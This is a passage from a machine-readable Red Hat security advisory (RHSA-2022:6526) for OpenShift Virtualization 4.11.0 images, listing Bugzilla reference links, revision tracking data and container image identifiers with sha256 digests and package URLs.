"https://bugzilla.redhat.com/show_bug.cgi?id=2090037", }, { category: "external", summary: "2090038", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090038", }, { category: "external", summary: "2090042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090042", }, { category: "external", summary: "2090043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090043", }, { category: "external", summary: "2090046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090046", }, { category: "external", summary: "2090048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090048", }, { category: "external", summary: "2090054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090054", }, { category: "external", summary: "2090055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090055", }, { category: "external", summary: "2090056", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090056", }, { category: "external", summary: "2090057", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090057", }, { category: "external", summary: "2090059", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090059", }, { category: "external", summary: "2090064", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090064", }, { category: "external", summary: "2090066", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090066", }, { category: "external", summary: "2090068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090068", }, { category: "external", summary: "2090131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090131", }, { category: "external", summary: "2090350", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090350", }, { category: "external", summary: "2091003", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091003", }, { category: "external", summary: "2091058", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091058", }, { category: "external", summary: "2091309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091309", }, { category: "external", summary: "2091406", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091406", }, { category: "external", summary: "2091754", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091754", }, { category: "external", summary: "2091755", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091755", }, { category: "external", summary: "2091756", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091756", }, { category: "external", summary: "2091758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091758", }, { category: "external", summary: "2091760", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091760", }, { category: "external", summary: "2091761", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091761", }, { category: "external", summary: "2091762", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091762", }, { category: "external", summary: "2091764", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091764", }, { category: "external", summary: "2091765", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091765", }, { category: "external", summary: "2091766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091766", }, { category: "external", summary: "2091853", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091853", }, { category: "external", summary: "2091863", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091863", }, { category: "external", summary: "2091868", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091868", }, { category: "external", summary: "2091889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091889", }, { category: "external", summary: "2091897", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091897", }, { category: "external", summary: "2091904", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091904", }, { category: "external", summary: "2091911", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091911", }, { category: "external", summary: "2091940", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091940", }, { category: "external", summary: "2091945", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091945", }, { category: "external", summary: "2091946", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091946", }, { category: "external", summary: "2091982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091982", }, { category: "external", summary: "2092048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092048", }, { category: "external", summary: "2092052", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092052", }, { category: "external", summary: "2092071", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092071", }, { category: "external", summary: "2092079", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092079", }, { category: "external", summary: "2092158", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092158", }, { category: "external", summary: "2092228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092228", }, { category: "external", summary: "2092230", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092230", }, { category: "external", summary: "2092306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092306", }, { category: "external", summary: "2092337", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092337", }, { category: "external", summary: "2092359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092359", }, { category: "external", summary: "2092654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092654", }, { category: "external", summary: "2092662", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092662", }, { category: "external", summary: "2092663", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092663", }, { category: "external", summary: "2092664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092664", }, { category: "external", summary: "2092781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092781", }, { category: "external", summary: "2092783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092783", }, { category: "external", summary: "2092787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092787", }, { category: "external", summary: "2092789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092789", }, { category: "external", summary: "2092951", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092951", }, { category: "external", summary: "2093282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093282", }, { category: "external", summary: "2093691", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093691", }, { category: "external", summary: "2093713", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093713", }, { category: "external", summary: "2093715", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093715", }, { category: "external", summary: "2093716", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093716", }, { category: "external", summary: "2093772", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093772", }, { category: "external", summary: "2093773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093773", }, { category: "external", summary: "2093866", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093866", }, { category: "external", summary: "2093867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093867", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2094207", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094207", }, { category: "external", summary: "2094208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094208", }, { category: "external", summary: "2094217", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094217", }, { category: "external", summary: "2094222", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094222", }, { category: "external", summary: "2094323", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094323", }, { category: "external", summary: "2094405", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094405", }, { category: "external", summary: "2094440", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094440", }, { category: "external", summary: "2094451", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094451", }, { category: "external", summary: "2094453", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094453", }, { category: "external", summary: "2094465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094465", }, { category: "external", summary: "2094471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094471", }, { category: "external", summary: "2094481", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094481", }, { category: "external", summary: "2094486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094486", }, { category: "external", summary: "2094491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094491", }, { category: "external", summary: "2094495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094495", }, { category: "external", summary: "2094646", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094646", }, { category: "external", summary: "2094665", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094665", }, { category: "external", summary: "2094678", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094678", }, { category: "external", summary: "2094727", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094727", }, { category: "external", summary: "2094807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094807", }, { category: "external", summary: "2094813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094813", }, { category: "external", summary: "2094848", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094848", }, { category: "external", summary: "2095125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095125", }, { category: "external", summary: "2095129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095129", }, { category: "external", summary: "2095224", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095224", }, { category: "external", summary: "2095529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095529", }, { category: "external", summary: "2095530", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095530", }, { category: "external", summary: "2095532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095532", }, { category: "external", summary: "2095537", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095537", }, { category: "external", summary: "2095570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095570", }, { category: "external", summary: "2095573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095573", }, { category: "external", summary: "2095953", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095953", }, { category: "external", summary: "2095955", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095955", }, { category: "external", summary: "2096166", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096166", }, { category: "external", summary: "2096206", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096206", }, { category: "external", summary: "2096208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096208", }, { category: "external", summary: "2096263", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096263", }, { category: "external", summary: "2096333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096333", }, { category: "external", summary: "2096492", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096492", }, { category: "external", summary: "2096502", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096502", }, { category: "external", summary: "2096510", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096510", }, { category: "external", summary: "2096511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096511", }, { category: "external", summary: "2096620", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096620", }, { category: "external", summary: "2096781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096781", }, { category: "external", summary: "2096801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096801", }, { category: "external", summary: "2096845", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096845", }, { category: "external", summary: "2097328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097328", }, { category: "external", summary: "2097370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097370", }, { category: "external", summary: "2097465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097465", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2098134", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098134", }, { category: "external", summary: "2098135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098135", }, { category: "external", summary: "2098282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098282", }, { category: "external", summary: "2099443", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099443", }, { category: "external", summary: "2099533", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099533", }, { category: "external", summary: "2099535", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099535", }, { category: "external", summary: "2099539", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099539", }, { category: "external", summary: "2099566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099566", }, { category: "external", summary: "2099608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099608", }, { category: "external", summary: "2099633", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099633", }, { category: "external", summary: "2099639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099639", }, { category: "external", summary: "2099802", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099802", }, { category: "external", summary: "2100054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100054", }, { category: "external", summary: "2100284", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100284", }, { category: "external", summary: "2100415", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100415", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101192", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101192", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101485", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101954", }, { category: "external", summary: "2102076", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102076", }, { category: "external", summary: "2102116", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102116", }, { category: "external", summary: "2102117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102117", }, { category: "external", summary: "2102122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102122", }, { category: "external", summary: "2102124", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102124", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102127", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102127", }, { category: "external", summary: "2102129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102129", }, { category: "external", summary: "2102131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102131", }, { category: "external", summary: "2102135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102135", }, { category: "external", summary: "2102143", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102143", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102543", }, { category: "external", summary: "2102544", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102544", }, { category: "external", summary: "2102545", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102545", }, { category: "external", summary: "2104617", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104617", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106258", }, { category: "external", summary: "2110178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110178", }, { category: "external", summary: "2111359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111359", }, { category: "external", summary: "2111562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111562", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6526.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update", tracking: { current_release_date: "2025-05-02T16:09:51+00:00", generator: { date: "2025-05-02T16:09:51+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.3", }, }, id: "RHSA-2022:6526", initial_release_date: "2022-09-14T19:28:51+00:00", revision_history: [ { date: "2022-09-14T19:28:51+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-14T19:28:51+00:00", number: "2", summary: "Last updated version", }, { date: "2025-05-02T16:09:51+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.11 for RHEL 8", product: { name: "CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.11::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_id: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_identification_helper: { purl: "pkg:oci/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/checkup-framework&tag=v4.11.0-67", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.11.0-63", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.11.0-601", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.11.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.11.0-83", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.11.0-54", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_identification_helper: { purl: 